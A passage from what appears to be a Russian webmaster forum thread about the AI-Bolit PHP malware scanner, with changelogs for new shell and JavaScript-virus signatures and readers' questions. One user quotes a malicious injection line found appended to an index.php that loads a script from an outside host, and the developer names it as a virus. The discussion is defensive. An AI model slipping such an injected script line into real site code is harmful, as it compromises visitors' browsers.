Планируется. На счет письма - не уверен. Просто будет показываться сообщение о неактуальности текущей версии.
Кроме того, вышла новая версия 20120430:
- новые сигнатуры вирусов и шеллов - исправлена ошибка сканирования списка файлов - исправлена ошибка подсчета файлов в каталоге для вычисления дорвеев - корректная работа с русскими сообщениями при работе через веб и при запуске из командной строки - выставляется принудительно кодировка utf-8 - добавлены сниппеты для javascript вирусов и некоторых видов редиректа в .htaccess - немного улучшен дизайн отчета - сообщение о найденных больших файлах выдается только при полном сканировании
- добавлен алгоритм дешифрования ASCII последовательностей перед проверкой сигнатур - это очень серьезный прорыв. Теперь кол-во детектируемого зла вырастет в разы. - три новых сигнатуры JS вируса - три сигнатуры шелла - добавлена проверка .phtml и .shtml по-умолчанию - исправлена ошибка отображения файлов с невидимыми ссылками
- добавлены 6 сигнатур шеллов - добавлены 3 сигнатуры JS вирусов - добавил вызов set_time_limit(0) в скрипт - исправлена работа с расширениями для php - учитывается .phtml при проверке на сигнатуры, добавлено расширение .khtml - добавлено детектирование auto_append_file/auto_prepend_file в .htaccess - вывод списка найденных невидимых ссылок - добавил определение stripos, если ее нет в PHP - исправлено несколько мелочей
скачал. проверяю. спасибо! уверен что штука оч. нужная. особенно для моего сайта :) - индусы, китайци и латиносы уже задолбали искать дыры и подбирать пароли... однако иногда им это удавалось..
Для информации - я настроил апаче так, что вместо .htaccess используется другой файл. и никто не знает какой.... кроме апаче и меня... может кому тоже пригодится такая защита от вирусов - .htaccess есть, а апаче он и не нужен - приманка для вирусов. а кто туда полез - того в бан по IP.
А реально ли сделать такой скрипт, что бы он ловил обращения к сайту "на лету" + банил по IP и по всяким вредным для сайта запросам и атакам на Mysql и БД? В своё время я делал подобное - но только для .exe файлов. Т.е. файл (сайт) сам себя защищает от вторжений и от несанкционированных изменений.
---------- Сообщение добавлено 03:58 ---------- Предыдущее 03:32 ----------
mnemonic,echo '<script src="http://stat.dontexist.com/style.js"></script>'; -вот такая штука дописывается в конец конец файла индекс.пхп и сайту приходит пипец. это что за хрень?
valnick, про .htaccess вы бы написали инструкцию для людей, как это сделать. Да и нужно пояснить, что это можно будет сделать только на выделенном сервере (или виртуальном выделенном).
вот такая штука дописывается в конец
Вирус. Подключаться может многими вариантами: из БД, через auto_append, просто по FTP. Если интересуют детали - напишите мне на почту (на сайте айболита есть).
- появился список игнорируемых файлов .aignore - добавлена возможность просмотра файла - добавлены сигнатуры шеллов - есть возможность скрыть в отчете показ директории открытых на запись - в подозрительные добавлены подстроки, появляющиеся в обфусцированных скриптах - добавлена проверка на наличие хакерских тулзов для FreeBSD - несколько багфиксов
Теперь можно ткнуть в имя файла и посмотреть его полное содержимое. А еще в этой версии я все-таки решил реализовать список игнорируемых файлов (по фрагменту имени и контрольной сумме). Можно вручную создать файл .aignore и положить в него
фрагмент имени файла1 <табуляция> контрольная сумма1 фрагмент имени файла2 <табуляция> контрольная сумма2 ...
А можно просто кликать по значениям столбца CRC32, а потом внизу скопировать из формы содержимое в файл. Если вам надоело наблюдать длинный список ложносрабатываемых файлов из джумлы, tinyMCE, vBulletin или друпала, просто создайте свой собственный .aignore и положите его рядом с ai-bolit.php.
Качаем свежую версию http://revisium.com/ai/ с обновленными сигнатурами. Скоро сделаю еще много полезных фишек в скрипте. Следите за апдейтами.
mnemonic, Внушительный такой список изменений получился. Было бы круто распространять такой файл (по умолчанию или по желанию) для дефолтных сборок популярных цмс